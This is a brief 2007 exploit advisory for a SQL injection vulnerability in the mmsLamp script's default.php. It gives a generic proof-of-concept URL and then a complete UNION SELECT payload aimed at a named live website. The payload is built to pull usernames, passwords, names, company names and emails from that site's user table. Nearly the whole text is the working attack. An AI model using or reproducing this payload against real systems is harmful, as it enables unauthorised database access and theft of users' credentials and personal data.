Name : mmsLamp SQL Injection Vulnerability. Author : x0kster Email : x0kster@gmail.com Script Page : http://www.brand039.com/?service=prodotti_dettaglio&idpro=4 Date : 22/12/2007 Bug in : default.php PoC : http://site.com/default.php?service=prodotti_dettaglio&idpro=[SQL] Example: http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/*